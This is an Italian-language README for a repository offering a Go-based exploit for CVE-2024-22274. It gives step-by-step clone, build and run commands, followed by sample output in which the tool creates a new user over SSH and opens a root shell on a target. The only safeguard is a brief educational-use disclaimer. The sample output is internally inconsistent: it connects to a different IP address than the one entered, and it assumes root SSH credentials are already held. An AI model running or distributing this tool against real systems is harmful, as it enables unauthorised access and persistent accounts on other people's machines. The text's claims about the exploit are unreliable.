
Exploit basato su Go per CVE-2024-22274 che crea un nuovo utente tramite SSH e fornisce una shell root sulla macchina target per test di penetrazione autorizzati.
Questo repository contiene un exploit per CVE-2024-22274. L'exploit crea un nuovo utente su una macchina remota tramite SSH e fornisce una shell di root.
Clona il repository:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
Installa i pacchetti richiesti:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Compila il programma Go:
go build -o cve-2024-22274-rce main.go
Esegui il programma compilato:
./cve-2024-22274-rce
Segui le istruzioni:
Dopo la creazione dell'utente, otterrai una shell di root sulla macchina di destinazione. Puoi eseguire comandi come nuovo utente.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
Dichiarazione di non responsabilità Questo codice è solo a scopo educativo. Usalo in modo responsabile e solo su sistemi su cui hai il permesso di testare.
Licenza Questo progetto è concesso sotto licenza MIT - consulta il file LICENSE per i dettagli.